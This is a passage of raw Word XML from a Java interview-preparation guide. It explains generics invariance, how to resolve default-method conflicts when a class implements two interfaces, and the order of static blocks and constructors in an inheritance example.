      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and results in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compilation error</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168BE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A73F79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ecause of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invariance in generics</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java. Even though String is a subtype of Object, List&lt;String&gt; is </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a subtype of List&lt;Object&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEECD47"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pilation Error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D45D9B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compatible types: ArrayList&lt;String&gt; cannot be converted to List&lt;Object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDE87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rect Alternatives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B224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allow a list that can hold any type, use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AEAE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gt; var = new ArrayList&lt;String&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03691A8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gt; is a list of unknown type — it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (you can't add elements to it except null).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722B5F2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write elements (with limitations), use bounded wildcards:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EEE25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 extends Object&gt; var = new ArrayList&lt;String&gt;(); // read-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6D144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Or just declare the list with matching generics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF62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String&gt; var = new ArrayList&lt;String&gt;(); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC1219">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6479A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lastRenderedPageBreak/>
        <w:t>Let me know if you’d like a quick cheat sheet on generics with wildcards (?, extends, super) — super handy in interviews!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5B705" w14:textId="433DA6F6" w:rsidR="00F851C0" w:rsidRDefault="00000000" w:rsidP="003E4B77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="0C3D826B">
          <v:rect id="_x0000_i1891" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B15ED" w14:textId="233BD30D" w:rsidR="00F851C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="320" w:name="_Toc197867534"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario based question - </w:t>
      </w:r>
      <w:r w:rsidR="00DD4C85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="320"/>
    </w:p>
    <w:p w14:paraId="6AD017FD" w14:textId="7C11B4C8" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:divId w:val="1728063314"/>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explain below code and what if I want to call both the interface default methods? How you will  implement it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21491633"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BE5793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D68394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2269394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9C6F0F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201833D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5B888FD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10357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832DBB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7223DAF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49312C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79439A2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317CD54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D0EF73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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF4A035" w14:textId="558E6A79"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r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533B0241" w14:textId="0C5EAA51" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="000756C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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ode you've provided is an example of multiple inheritance in Java, where a class (MyClass) implements two interfaces (InterfaceA and InterfaceB), each of which has a default method with the same signature (display()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D25F77"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Explanation of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A528A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A</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a default method display(), which prints "Display from InterfaceA".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79147E8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B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> also has a default method display(), which prints "Display from InterfaceB".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224608C9"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lass MyClass implements both interfaces InterfaceA and InterfaceB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBCC7A"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Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C704CC5"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 xml:space="preserve">When a class implements multiple interfaces that have the same default method, there is a conflict because Java does not know which display() method to call. The compiler will throw a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time error</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> saying that the default method display() is inherited from more than one interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E0380"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How to Implement Both display() Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0519089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o resolve this conflict, you can override the display() method in MyClass and explicitly call both default methods from the interfaces. Here's how you can implement it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07208E1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6F7EDAA"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065360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75D7596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18DA5C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21C8ECB"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6C9EC5A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210A10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2FF81C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4F21C9FD"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E4ED8E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1E5237E"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1E8F440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930D3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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61212B2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081429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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// Calling both the interface default methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E5A43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49DA367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536739B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A1DB87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p>
    <w:p w14:paraId="213B3DD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stat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main</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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8BF73C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obj </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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>new</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9BF5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obj</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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// This will call both methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE0D8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423FA97A" w14:textId="06C5B158"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725F0891"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Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D897F0"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Calling Interface Default Methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Inside the display() method in MyClass, we use InterfaceA.super.display() and InterfaceB.super.display() to explicitly invoke the default methods from both interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49B65F"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Why this Works</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The super keyword allows you to call methods from interfaces directly, even if there are conflicts. You must qualify which interface's method you are calling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6085E"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDBDE48"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A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEB4BB7"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B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4AA55" w14:textId="77777777" w:rsid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is way, both display() methods are invoked as per the requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025917DD" w14:textId="0DAF12EF" w:rsidR="00A4327D" w:rsidRDefault="00000000" w:rsidP="00F851C0">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F52592">
          <v:rect id="_x0000_i1892" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6C27C8" w14:textId="12B779C5" w:rsidR="000133E9" w:rsidRPr="00CE4B95" w:rsidRDefault="000133E9" w:rsidP="000133E9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="321" w:name="_Toc197867535"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario based question - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="321"/>
    </w:p>
    <w:p w14:paraId="333EF7E0" w14:textId="4CDDDC47" w:rsidR="000133E9" w:rsidRPr="00CE4B95" w:rsidRDefault="000133E9" w:rsidP="000133E9">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Explain output of below program in detail?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AF4BA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0F662C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738DBC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Static"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B53B5C2"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570BF4D"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167AF0F"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1B3B43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Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261616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8774D6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53E09E8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6B2EEA3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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>//Child.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC819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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extend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3648B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355BF5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Static"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B99CC8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66482B7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79B92915"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F6A0031"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Constructor"</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3096317E"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CF5728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3F36C6D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000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="000133E9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> args</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377B366"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1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122A22D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2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7587D40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6DDA0F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2F74821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2E3DDA2" w14:textId="6B5C7120" w:rsidR="00C975C6" w:rsidRPr="00C975C6" w:rsidRDefault="00C975C6" w:rsidP="0008690C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Code Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA6D5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Base Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0256A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Base Static".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC27A7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Base Constructor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E1EDFF"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lass:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E74085B"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Child Static".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44717827"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Child Constructor".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501B5BF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Main Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4E15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wo instances of Child are created and assigned to Base references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04666835"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Execution Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B86E4D"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1: Static Block Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C70E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When the main() method is executed, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static blocks</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are executed first (for the class loading process).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4033AA6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Base class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D078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Base class is loaded when we create an instance of Child because Child inherits from Base.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B5FB1E"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tatic block of Base executes first, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256F6F2A"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3F0859C0"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Child class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67FD22"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Next, the Child class is loaded. The static block in Child is executed after the Base static block, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3666C7C9"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lastRenderedPageBreak/>
        <w:t>Child Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B39F8"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2: Object Creation (Constructor Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BBB1A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First Object Creation (child1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609BA70A"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rst Child object is created with the statement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Base child1 = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64142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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70652C99"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The constructor of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Base) is invoked first because every child class constructor implicitly calls its parent class constructor (either explicitly or implicitly).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746CD806"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us, the Base constructor runs first, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8547F"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6ABE386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1E87482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After the parent class constructor completes, the constructor of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>child class</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Child) executes, printing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6B2A4"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B600E3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econd Object Creation (child2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0DA573"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econd Child object is created with the statement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C975C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Base child2 = new Child();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59910E55"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 (Again):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFBFC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s before, the Base constructor is called first, printing:</w:t>
      </w:r>
    </w:p>
